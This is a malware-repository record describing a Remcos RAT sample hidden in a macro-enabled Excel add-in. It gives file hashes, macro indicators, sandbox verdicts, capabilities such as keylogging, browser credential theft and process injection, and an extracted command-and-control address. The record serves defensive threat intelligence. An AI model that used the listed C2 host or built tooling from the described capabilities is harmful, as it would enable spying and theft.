MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 5000f900d0d52fb1b6634d0437711ab10c9184d080c852f17b2fb114a35446a8. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry

RemcosRAT

Vendor detections: 8

Maldoc score: 11

Intelligence 8 IOCs YARA File information Comments

SHA256 hash:	5000f900d0d52fb1b6634d0437711ab10c9184d080c852f17b2fb114a35446a8
SHA3-384 hash:	62c81aae67c9ac6d5ab97d24610b9db141add74e6bc200ceaf7c124742799d15fe69e467567824968ddd055312a25f01
SHA1 hash:	7bb0d46b6a36833178180c57b35c2b2bee02eb36
MD5 hash:	98d926593ca28b2b418fb4208b374c9c
humanhash:	delta-kilo-carpet-uranus
File name:	etat_comp_du27082021.xlam
Download:	download sample
Signature	RemcosRAT Create hunting rule
File size:	17'815 bytes
First seen:	2021-09-01 09:27:38 UTC
Last seen:	Never
File type:	xlsx
MIME type:	application/vnd.openxmlformats-officedocument.spreadsheetml.sheet
ssdeep	384:AKlRn4Nq7lgTXSLPu/IasgZY2esqqABF3dI2IgHgR6fQITMaXIG:AKlFRlKCLPFaO27M7I6gRTIgKIG
TLSH	T1DF82D08DC196B839DB030D3E556C96E0E208384246B792BF5C18F3377982A87934F1CA
Reporter	J_Hunt3r
Tags:	DESKTOP-group remcos RemcosRAT xlsx

J_Hunt3r

Desktop_group started using Remcos again

Office OLE Information

This malware samples appears to be an Office document. The following table provides more information about this document using oletools and oledump.

OLE id

Maldoc score: 11

OLE dump

MalwareBazaar was able to identify 7 sections in this file using oledump:

Section ID	Section size	Section name
A1	435 bytes	PROJECT
A2	62 bytes	PROJECTwm
A3	977 bytes	VBA/Sheet1
A4	12458 bytes	VBA/ThisWorkbook
A5	4038 bytes	VBA/_VBA_PROJECT
A6	525 bytes	VBA/dir

OLE vba

MalwareBazaar was able to extract and deobfuscate VBA script(s) the following information from OLE objects embedded in this file using olevba:

Type	Keyword	Description
AutoExec	Workbook_Open	Runs when the Excel Workbook is opened
Suspicious	Open	May open a file
Suspicious	Run	May run an executable file or a system command
Suspicious	CreateObject	May create an OLE object
Suspicious	Hex Strings	Hex-encoded strings were detected, may be used to obfuscate strings (option --decode to see all)
Suspicious	Base64 Strings	Base64-encoded strings were detected, may be used to obfuscate strings (option --decode to see all)

Intelligence

File Origin

# of uploads :

# of downloads :

217

Origin country :

n/a

Vendor Threat Intelligence

Verdict:

Legit

File type:

application/vnd.openxmlformats-officedocument.spreadsheetml.sheet

Has a screenshot:

False

Contains macros:

True

Detection:

n/a

Link:

https://www.capesandbox.com/analysis/184424/

Detection(s):

MiscreantPunch.EvilMacro.PSHELLNEWOBJECTw.1.UNOFFICIAL

TwinWave.EvilDoc.DOCXRSTRGOOD.NEW-OBJECT.200322B64.12.UNOFFICIAL

TwinWave.EvilDoc.DOCXRSTRGOOD.NEW_OBJECT.200630B64.13.UNOFFICIAL

TwinWave.EvilDoc.DOCXRSTRGOOD.HTTP_.210304B64.1.UNOFFICIAL

Result

Verdict:

Malware

Maliciousness:

Behaviour

Sending a UDP request

Creating a window

Creating a process with a hidden window

Sending an HTTP GET request to an infection source

Launching a process

Launching the default Windows debugger (dwwin.exe)

Connection attempt to an infection source

Launching a process by exploiting the app vulnerability

Unauthorized injection to a system process

Result

Verdict:

Malicious

File Type:

Excel File with Macro

Link:

https://app.docguard.net/5000f900d0d52fb1b6634d0437711ab10c9184d080c852f17b2fb114a35446a8/results/dashboard

Result

Verdict:

MALICIOUS

Link:

https://labs.inquest.net/dfi/sha256/5000f900d0d52fb1b6634d0437711ab10c9184d080c852f17b2fb114a35446a8

Details

Base64 Encoded Powershell Directives

Detected one or more base64 encoded Powershell directives.

Macro with Startup Hook

Detected macro logic that will automatically execute on document open. Most malware contains some execution hook.

IPv4 Dotted Quad URL

A URL was detected referencing a direct IP address, as opposed to a domain name.

Base64 Encoded URL

Detected an ANSI or UNICODE http:// or https:// base64 encoded URL prefix.

Document With No Content

Document contains little or no semantic information.

Result

Threat name:

Remcos

Detection:

malicious

Classification:

troj.spyw.expl.evad

Score:

100 / 100

Link:

https://www.joesandbox.com/analysis/843218

Signature

C2 URLs / IPs found in malware configuration

Contains functionality to inject code into remote processes

Contains functionality to register a low level keyboard hook

Contains functionality to steal Chrome passwords or cookies

Contains functionality to steal Firefox passwords or cookies

Delayed program exit found

Detected Remcos RAT

Document contains an embedded VBA macro which may execute processes

Document contains an embedded VBA with base64 encoded strings

Document exploit detected (process start blacklist hit)

Encrypted powershell cmdline option found

Found malware configuration

Injects a PE file into a foreign processes

Installs a global keyboard hook

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Sigma detected: Microsoft Office Product Spawning Windows Shell

Sigma detected: Suspicious Encoded PowerShell Command Line

Writes to foreign memory regions

Yara detected Remcos RAT

Behaviour

Behavior Graph:

Download SVG

Detection:

n/a

Link:

https://mwdb.cert.pl/sample/5000f900d0d52fb1b6634d0437711ab10c9184d080c852f17b2fb114a35446a8/

Threat name:

Script-Macro.Trojan.Amphitryon

Status:

Malicious

First seen:

2021-09-01 09:28:04 UTC

AV detection:

8 of 45 (17.78%)

Threat level:

5/5

Result

Malware family:

remcos

Score:

10/10

Tags:

family:remcos botnet:remotehost macro rat

Link:

https://tria.ge/reports/210901-rjwvyldt52/

Behaviour

Checks processor information in registry

Enumerates system info in registry

Modifies Internet Explorer settings

Suspicious behavior: AddClipboardFormatListener

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of AdjustPrivilegeToken

Suspicious use of FindShellTrayWindow

Suspicious use of SetWindowsHookEx

Suspicious use of WriteProcessMemory

Office loads VBA resources, possible macro or embedded object present

Suspicious use of SetThreadContext

Blocklisted process makes network request

Process spawned unexpected child process

Remcos

Malware Config

C2 Extraction:

toornavigator.sytes.net:35500

Verdict:

Malicious

Link:

https://www.vmray.com/analyses/5000f900d0d5/report/overview.html

Please note that we are no longer able to provide a coverage score for Virus Total.

Threat name:

Malicious File

Score:

1.00

Link:

https://yomi.yoroi.company/submissions/5000f900d0d52fb1b6634d0437711ab10c9184d080c852f17b2fb114a35446a8

File information

The table below shows additional information about this malware sample such as delivery method and external references.

any.run

https://app.any.run/tasks/036e9229-5db0-4836-95a9-7b61a9d3bfc2

Cape

https://www.capesandbox.com/analysis/184424/

Comments

Login required

You need to login to in order to write a comment. Login with your abuse.ch account.

No comments found for this malware sample